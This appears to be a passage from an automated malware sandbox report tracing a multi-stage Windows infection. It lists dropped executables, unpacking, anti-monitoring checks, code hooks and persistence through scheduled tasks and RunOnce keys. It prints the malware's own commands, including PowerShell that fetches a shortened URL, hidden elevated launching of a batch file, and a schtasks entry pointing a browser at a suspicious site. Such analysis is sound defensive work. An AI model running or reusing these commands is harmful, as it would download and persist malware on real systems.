Source:	Binary string: BitLockerToGo.pdbGCTL source: O3B6wY7ZkFhh.exe, 00000031.00000003.2096843512.0000027E7E510000.00000004.00001000.00020000.00000000.sdmp, O3B6wY7ZkFhh.exe, 00000031.00000002.2105790979.000000C0001A3000.00000004.00001000.00020000.00000000.sdmp, O3B6wY7ZkFhh.exe, 00000031.00000003.2097093034.0000027E7E4D0000.00000004.00001000.00020000.00000000.sdmp, O3B6wY7ZkFhh.exe, 00000031.00000002.2101844018.000000C00009E000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32[ source: svhosts.exe, 00000029.00000002.3919826087.0000000006001000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\7.exe	Unpacked PE file: 9.2.7.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tpchzztf:EW;yamaqmnm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tpchzztf:EW;yamaqmnm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Unpacked PE file: 10.2.axplong.exe.6b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tpchzztf:EW;yamaqmnm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tpchzztf:EW;yamaqmnm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Unpacked PE file: 11.2.axplong.exe.6b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tpchzztf:EW;yamaqmnm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tpchzztf:EW;yamaqmnm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Unpacked PE file: 33.2.1.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"

Source: 1Vkf7silOj.exe

Static PE information: 0xB6CE1FF5 [Thu Mar 10 05:51:49 2067 UTC]

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 18_2_0061BEA9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

18_2_0061BEA9

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp-~&

Source: NewLatest.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x755f6
Source: alex5555555.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x1cce1c
Source: whiteheroin[1].exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x1373ab
Source: 7.exe.1.dr	Static PE information: real checksum: 0x1ca928 should be: 0x1cb297
Source: 123[1].exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x4e916
Source: 123.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x4e916
Source: Hkbsse.exe.18.dr	Static PE information: real checksum: 0x0 should be: 0x755f6
Source: NewLatest[1].exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x755f6
Source: gold.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x84a86
Source: axplong.exe.9.dr	Static PE information: real checksum: 0x1ca928 should be: 0x1cb297
Source: ldr[1].exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x73c68
Source: gold[1].exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x84a86
Source: alex5555555[1].exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x1cce1c
Source: 1Vkf7silOj.exe	Static PE information: real checksum: 0x0 should be: 0x4e916
Source: ldr.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x73c68
Source: TpWWMUpe0LEV.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x1373ab
Source: Hkbsse.exe.32.dr	Static PE information: real checksum: 0x0 should be: 0x73c68

Source: 6.exe.1.dr	Static PE information: section name: .vmp-~&
Source: 6.exe.1.dr	Static PE information: section name: .vmp-~&
Source: 6.exe.1.dr	Static PE information: section name: .vmp-~&
Source: 7.exe.1.dr	Static PE information: section name:
Source: 7.exe.1.dr	Static PE information: section name: .idata
Source: 7.exe.1.dr	Static PE information: section name:
Source: 7.exe.1.dr	Static PE information: section name: tpchzztf
Source: 7.exe.1.dr	Static PE information: section name: yamaqmnm
Source: 7.exe.1.dr	Static PE information: section name: .taggant
Source: axplong.exe.9.dr	Static PE information: section name:
Source: axplong.exe.9.dr	Static PE information: section name: .idata
Source: axplong.exe.9.dr	Static PE information: section name:
Source: axplong.exe.9.dr	Static PE information: section name: tpchzztf
Source: axplong.exe.9.dr	Static PE information: section name: yamaqmnm
Source: axplong.exe.9.dr	Static PE information: section name: .taggant
Source: vcf-to-csv-converter[1].exe.10.dr	Static PE information: section name: .xdata
Source: O3B6wY7ZkFhh.exe.10.dr	Static PE information: section name: .xdata
Source: whiteheroin[1].exe.10.dr	Static PE information: section name: ._LW
Source: TpWWMUpe0LEV.exe.10.dr	Static PE information: section name: ._LW

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_0521D912 push eax; ret	1_2_0521D921
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 1_2_06D41EB1 push es; iretd	1_2_06D41EBC
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 10_2_006CD82C push ecx; ret	10_2_006CD83F
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 12_2_00159A6C push ecx; ret	12_2_00159A7F
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_00601314 push ecx; retn 0000h	18_2_00601315
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0060064F push ss; iretd	18_2_00600650
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0060D82C push ecx; ret	18_2_0060D83F
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0060DED6 push ecx; ret	18_2_0060DEE9

Source: 7.exe.1.dr	Static PE information: section name: entropy: 7.983198526374954
Source: 7.exe.1.dr	Static PE information: section name: tpchzztf entropy: 7.9536094484412185
Source: axplong.exe.9.dr	Static PE information: section name: entropy: 7.983198526374954
Source: axplong.exe.9.dr	Static PE information: section name: tpchzztf entropy: 7.9536094484412185
Source: whiteheroin[1].exe.10.dr	Static PE information: section name: .text entropy: 7.945036065819348
Source: TpWWMUpe0LEV.exe.10.dr	Static PE information: section name: .text entropy: 7.945036065819348

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\NewLatest[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcf-to-csv-converter[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	File created: C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	File created: C:\Users\user\AppData\Roaming\d3d9.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ldr[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\gold[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\123[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File created: C:\Users\user\AppData\Local\Temp\7.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	File created: C:\Users\user\AppData\Local\Temp\6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\alex5555555[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\whiteheroin[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7.exe	File created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\1[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	File created: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Installer[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\Local\Temp\7.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"

Source: C:\Users\user\AppData\Local\Temp\7.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Windows\System32\svchost.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\AppData\Local\Temp\6.exe	Memory written: PID: 7776 base: 15D0005 value: E9 8B 2F 19 76			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe	Memory written: PID: 7776 base: 77762F90 value: E9 7A D0 E6 89			Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49776

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 18_2_0060C66B GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

18_2_0060C66B

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
